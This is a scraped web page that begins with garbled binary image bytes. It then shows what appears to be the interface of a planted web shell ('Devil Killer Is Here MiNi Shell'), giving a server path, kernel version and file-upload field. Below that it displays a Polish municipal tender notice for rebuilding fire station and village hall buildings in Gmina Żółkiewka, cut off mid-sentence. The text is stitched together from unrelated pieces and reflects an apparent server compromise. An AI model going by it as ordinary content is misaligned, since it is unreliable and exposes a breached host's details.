JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250425/0020639001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa budynków OSP i świetlicy wiejskiej na terenie gminy Żółkiewka </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŻÓŁKIEWKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950371726</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Hetmana Żółkiewskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żółkiewka-Osada</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-335</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846831676</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">846831678</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zolkiewka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zolkiewka.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa budynków OSP i świetlicy wiejskiej na terenie gminy Żółkiewka </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b8aaafc7-142c-4ecb-99cf-fca772acf901</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00206390</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.zolkiewka.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim przy użyciu środków komunikacji<br/>elektronicznej za pośrednictwem Platformy<br/>https://zamowienia.zolkiewka.pl lub poczty elektronicznej: sekretariat@zolkiewka.pl Korzystanie z<br/>platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oświadczenia, wnioski, zawiadomienia<br/>oraz informacje Wykonawcy przekazują drogą elektroniczną<br/>przy użyciu Platformy lub poczty elektronicznej. Za datę wpływu oświadczeń, wniosków, zawiadomień<br/>oraz informacji przyjmuje się datę:<br/>1.1. w przypadku korzystania z Platformy – datę ich rejestracji na Platformie;<br/>1.2. w przypadku korzystania z poczty elektronicznej – datę zapisu na serwerze odbiorczym<br/>(Zamawiającego).<br/>2. Ogólne zasady korzystania z Platformy:<br/>2.1. Korzystanie z platformy jest bezpłatne.<br/>2.2. Instrukcja Użytkownika - korzystania z Platformy Zamówień Publicznych ZETOPZP znajduje się na<br/>Portalu, w zakładce „Pomoc”.<br/>2.3. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie<br/>rejestrując się lub logując, w przypadku posiadania konta w Platformie Zamówień Publicznych<br/>ZETOPZP, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na<br/>stronie internetowej https://zamowienia.zolkiewka.pl w zakładce pomoc oraz uznaje go za wiążący.<br/>2.4. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>https://zamowienia.zolkiewka.pl/#/authentication/login<br/>2.5. Wykonawca aby przystąpić do postępowania musi założyć konto na<br/>Platformie https://zamowienia.zolkiewka.pl/#/authentication/register gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, otrzymuje link aktywacyjny a następnie ustanawia<br/>hasło.<br/>2.6. Proces rejestracji Wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy podać dane<br/>firmy, którą osoba zakładająca konto reprezentuje.<br/>2.7. Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja<br/>między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy i powiadomień mailowych.<br/>3. Zgodnie z art. 67 ustawy Pzp, Zamawiający podaje wymagania techniczne związane z korzystaniem<br/>z Platformy:<br/>3.1. stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512<br/>kb/s.<br/>3.2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 10 , Mac Os x 10.4, Linux, lub ich nowsze<br/>wersje.<br/>3.3. zainstalowana dowolna przeglądarka internetowa najlepiej najnowszej dostępnej wersji<br/>obsługująca TLS 1.2 z wyjątkiem Internet Explorer.<br/>3.4. Włączona obsługa JavaScript.<br/>3.5. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>3.6. podłączony lub wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę<br/>certyfikatu używanego przez Wykonawcę.<br/>3.7. Zamawiający, zgodnie z § 3 ust. 3 powołanego powyżej Rozporządzenia określa:<br/>3.7.1. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 100 MB.<br/>3.7.2. Informacje na temat kodowania i odbioru danych:<br/>3.7.2.1. Plik załączony przez Wykonawcę na Platformie Zamówień Publicznych ZETOPZP i zapisany,<br/>widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert.<br/>3.7.2.2. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu platformy Microsoft Azure, który jest synchronizowany ze<br/>znacznikiem czasu UTC.<br/>3.8. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami<br/>korzystania z platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma Zamówień<br/>Publicznych, tel. +48 817184227, e-mail:<br/>pomoc@zeto.lublin.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. W sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1.1. Administratorem Pani/Pana danych osobowych jest Wójt Gminy Żółkiewka.<br/>1.2. Kontakt z Inspektorem Ochrony Danych – inspektor@cbi24.pl<br/>1.3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego.<br/>1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>1.5. Pani/Pana dane osobowe będą przechowywane na czas przewidziany przepisami prawa.<br/>1.6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp.<br/>2 . W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO.<br/>3. Posiada Pani/Pan:<br/>3.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>3.2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;3.3 na<br/>podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>3.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>4. Nie przysługuje Pani/Panu:<br/>4.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>4.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO.<br/>4.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKR.271.5.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja inwestycji pn.: „Przebudowa budynków OSP i świetlicy wiejskiej na terenie gminy Żółkiewka&#34;.<br/>4.2.	W skład zamówienia wchodzą trzy (3) zadania:<br/>4.1.1.	Zadanie 1: Przebudowa budynku OSP Wierzchowina <br/>4.1.2.	Zadanie 2: Przebudowa budynku OSP Olchowiec<br/>4.1.3.	Zadanie 3: Przebudowa budynku Świetlicy Wiejskiej Żółkiew Wieś<br/><br/>4.3. Zamówienie w zakresie zadania 1 – przebudowa budynku OSP Wierzchowina Zakres prac budowlanych OSP Wierzchowina obejmuje wykonanie między innymi:<br/>4.3.1. Wymianę drzwi zewnętrznych <br/>4.3.2. Montaż klimatyzatorów typu Split – Uwaga!!! Wraz z kosztorysem ofertowym należy przedłożyć minimum trzy oferty proponowanych urządzeń spełniających wymagane parametry.<br/>4.3.3. Docieplenie elewacji <br/>- wykonanie hydroizolacji ścian fundamentowych i części podpiwniczonej <br/>- docieplenie ścian fundamentowych i części podpiwniczonej <br/>- wykonanie cokołu z tynku cienkowarstwowego <br/>- wymiana rur spustowych, rynien i obróbek blacharskich <br/>- docieplenie ścian wraz z wykonaniem tynków cienkowarstwowych <br/>- montaż uchwytu na flagi <br/>- wykonanie napisu. <br/>4.3.4. Remont schodów <br/>- naprawa powierzchni betonowej <br/>- wymiana balustrady. <br/>4.3.5. Roboty elektryczne: <br/>- instalacja klimatyzatorów: 2szt., <br/>- instalacja oświetlenia placu przed budynkiem remizy - Uwaga!!! Wraz z kosztorysem ofertowym należy przedłożyć minimum trzy oferty proponowanych urządzeń spełniających wymagane parametry. <br/>- wymiana tablicy głównej budynku, <br/>- montaż złącza pomiarowego na zewnątrz budynku łącznie z przeniesieniem licznika pomiaru energii elektrycznej, <br/>- montaż połączenia istniejącego przyłącza do złącza pomiarowego.<br/>	4.3.6.	Gwarancja. Długość okresu gwarancji (wykonane roboty budowlane, montażowe i instalacyjne) - stanowi kryterium oceny ofert. Zamawiający określa go na okres w przedziale od 36 miesięcy (termin minimalny) do 60 miesięcy (termin maksymalny). Zamawiającemu przysługują pełne uprawnienia z tytułu rękojmi za wady wynikające z przepisów kodeksu cywilnego w terminach tam określonych – niezależnie od uprawnień z tytułu gwarancji. <br/>4.3.7. Szczegółowy opis i zakres wykonania przedmiotu zamówienia określa dokumentacja projektowa, (zał. nr 1 do SWZ) oraz wzór umowy (zał. Nr 6 do SWZ). <br/>4.3.8. CPV: <br/>45261000-4 Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty <br/>45442300-0 Roboty w zakresie ochrony powierzchni <br/>45321000-3 Izolacja cieplna <br/>45324000-4 Roboty w zakresie okładziny tynkowej <br/>45453000-7 Roboty remontowe i renowacyjne <br/>45443000-4 Roboty elewacyjne <br/>45261200-6 Wykonywanie pokryć dachowych i malowanie dachów<br/>	<br/>4.4.	Zamówienie w zakresie zadania 2 – przebudowa budynku OSP Olchowiec Zakres robót budowlanych w budynku OSP Olchowiec obejmuje między innymi wykonanie:<br/>	4.4.1. Roboty ziemne - odkopanie ścian fundamentowych <br/>- podbicie ścian betonem zbrojonym <br/>- wykonanie izolacji poziomej <br/>4.4.2. Izolacje zewnętrzne <br/>- oczyszczenie muru <br/>- impregnacja przeciwsolna <br/>- wyrównanie ścian <br/>- izolacja przeciwwilgociowa <br/>- izolacja cieplna <br/>- obróbka blacharska zabezpieczająca izolacje <br/>4.4.3. Roboty w części nie podpiwniczonej <br/>- stan surowy <br/>- odkopanie ścian fundamentowych <br/>- podbicie ścian betonem zbrojonym <br/>- oczyszczenie muru <br/>- impregnacja przeciwsolna i biobójczej <br/>- wyrównanie ścian <br/>- izolacja przeciwwilgociowa pionowa i pozioma <br/>- fundamenty betonowe <br/>- ściany betonowe <br/>- ściany działowe z bloków silikatowych wraz z nadprożami <br/>- posadzki betonowe <br/>- tynki wewnętrzna <br/>- malowanie <br/>4.4.4. Schody i strop <br/>- podkład betonowy pod schody <br/>- izolacja przeciwwodna pozioma <br/>- schody żelbetowe <br/>4.4.5. Roboty wykończeniowe - parter <br/>- izolacja przeciwwodna pozioma <br/>- posadzki z płytek terakotowych <br/>- okładziny ścian z płytek glazurowanych <br/>- ścianki z płyt HPL <br/>- malowanie farbami lateksowymi <br/>- montaż drzwi wewnętrznych <br/>4.4.6. Roboty wykończeniowe - I piętro <br/>- izolacja cieplna <br/>- posadzki z paneli winylowych <br/>- okładziny ścian z płytek glazurowanych <br/>- ścianki z płyt HPL <br/>- malowanie farbami emulsyjnymi <br/>- montaż balustrad schodowych <br/>4.4.7. Instalacja wentylacji i montaż klimatyzatorów. <br/>- przewody wentylacyjne z blachy stalowej <br/>- anemostaty kołowe <br/>- klimatyzatory - Uwaga!!! Wraz z kosztorysem ofertowym należy przedłożyć minimum trzy oferty proponowanych urządzeń spełniających wymagane parametry.<br/>4.4.8. Instalacja wod.-kan, <br/>- instalacja wodociągowa <br/>- instalacja kanalizacji sanitarnej <br/>4.4.9. Przyłącze wodociągowe <br/>- przyłącze wodociągowe <br/>- studnia wodomierzowa <br/>4.4.10. Przyłącze kanalizacji sanitarnej <br/>- przyłącze kanalizacyjne <br/>- betonowy bezodpływowy zbiornik na ścieki <br/>4.4.11. Docieplenie stropu z wełny mineralnej <br/>4.4.12. Roboty instalacyjne elektryczne zewnętrzne i wewnętrzne: <br/>- instalacja klimatyzatorów: 2szt. na piętrze, <br/>- instalacja gniazdo do zasilania ogrzewacza wody (bojlera), <br/>- instalacja oświetlenia podstawowego i ewakuacyjnego w części parterowej budynku oraz klatki schodowej, <br/>- wymiana tablicy głównej budynku, <br/>- montaż złącza pomiarowego na zewnątrz budynku łącznie z przeniesieniem licznika pomiaru energii elektrycznej, <br/>- montaż połączenia istniejącego przyłącza do złącza pomiarowego. <br/>- wstawienie słupa wsporczego syreny alarmowej z połączeniem kablowym do rozdzielnicy TG	<br/>4.4.13.	Gwarancja. Długość okresu gwarancji (wykonane roboty budowlane, montażowe i instalacyjne) - stanowi kryterium oceny ofert. Zamawiający określa go na okres w przedziale od 36 miesięcy (termin minimalny) do 60 miesięcy (termin maksymalny). Zamawiającemu przysługują pełne uprawnienia z tytułu rękojmi za wady wynikające z przepisów kodeksu cywilnego w terminach tam określonych – niezależnie od uprawnień z tytułu gwarancji. <br/>4.4.14. Szczegółowy opis i zakres wykonania przedmiotu zamówienia określa dokumentacja projektowa, (zał. nr 1 do SWZ) oraz wzór umowy (zał. Nr 6 do SWZ). <br/>4.4.15. CPV: <br/>	45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne <br/>45231300-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków 45231100-6 Ogólne roboty budowlane związane z budową rurociągów <br/>45310000-3 Roboty instalacyjne elektryczne <br/>45331000-6 Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych <br/>45321000-3 Izolacja cieplna 45332200-5 Roboty instalacyjne hydrauliczne <br/>45332300-6 Roboty instalacyjne kanalizacyjne <br/>45332400-7 Roboty instalacyjne w zakresie urządzeń sanitarnych <br/>45261000-4 Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty <br/>45262300-4 Betonowanie <br/>45262310-7 Zbrojenie <br/>45262500-6 Roboty murarskie i murowe <br/>45260000-7 Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistyczne <br/>45410000-4 Tynkowanie <br/>45420000-7 Roboty w zakresie zakładania stolarki budowlanej oraz roboty ciesielskie <br/>45440000-3 Roboty malarskie i szklarskie <br/>45453000-7 Roboty remontowe i renowacyjne <br/>45431000-7 Kładzenie płytek <br/>45432000-4 Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian <br/>45262100-2 Roboty przy wznoszeniu rusztowań<br/>4.5.	Zamówienie w zakresie zadania 3 – przebudowa budynku Świetlicy Wiejskiej Żółkiew Wieś Zakres robót budowlanych w budynku Świetlicy Wiejskiej Żółkiew Wieś obejmuje między innymi wykonanie:<br/>4.5.1. Kuchnia - wymiana stolarki okiennej <br/>- malowanie <br/>- wykonanie podłogi z wykładziny PCV <br/>4.5.2. Sala główna <br/>- wymiana stolarki okiennej i drzwiowej <br/>- malowanie <br/>- remont podłogi drewnianej <br/>- cyklinowanie i olejowanie <br/>- wykonanie otworu drzwiowego wraz z nadprożem <br/>- tynkowanie <br/>4.5.3. Szatnia <br/>- wymiana stolarki okiennej i drzwiowej <br/>- malowanie <br/>- wykonanie podłogi z wykładziny sztucznej <br/>- wykonanie otworu drzwiowego wraz z nadprożem <br/>- tynkowanie <br/>4.5.4. Roboty elektryczne <br/>- montaż połączenia istniejącego przyłącza do złącza pomiarowego ZP, <br/>- wymiana złącza pomiarowego na zewnątrz budynku łącznie z przeniesieniem licznika pomiaru energii elektrycznej, <br/>- instalacja oświetlenia podstawowego i ewakuacyjnego budynku, <br/>- instalacja gniazd wtykowych, <br/>- instalacja klimatyzatorów: 2szt. na piętrze - Uwaga!!! Wraz z kosztorysem ofertowym należy przedłożyć minimum trzy oferty proponowanych urządzeń spełniających wymagane parametry.<br/>- wymiana głównej tablicy rozdzielczej w budynku, <br/>- Istniejący drugi licznik energii (MOD A2 nr 3174313) zdemontować.<br/>	4.5.6.	Gwarancja. Długość okresu gwarancji (wykonane roboty budowlane, montażowe i instalacyjne) - stanowi kryterium oceny ofert. Zamawiający określa go na okres w przedziale od 36 miesięcy (termin minimalny) do 60 miesięcy (termin maksymalny). Zamawiającemu przysługują pełne uprawnienia z tytułu rękojmi za wady wynikające z przepisów kodeksu cywilnego w terminach tam określonych – niezależnie od uprawnień z tytułu gwarancji. <br/>4.5.7. Szczegółowy opis i zakres wykonania przedmiotu zamówienia określa dokumentacja projektowa, (zał. nr 1 do SWZ) oraz wzór umowy (zał. Nr 6 do SWZ). <br/>4.5.8. CPV: <br/>	45262500-6 Roboty murarskie i murowe <br/>45410000-4 Tynkowanie <br/>45442100-8 Roboty malarskie <br/>45421100-5 Instalowanie drzwi i okien, i podobnych elementów <br/>45310000-3 Roboty instalacyjne elektryczne <br/>45432000-4 Kładzenie i wykładanie podłóg, ścian i tapetowanie ścian <br/>45453000-7 Roboty remontowe i renowacyjne </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający 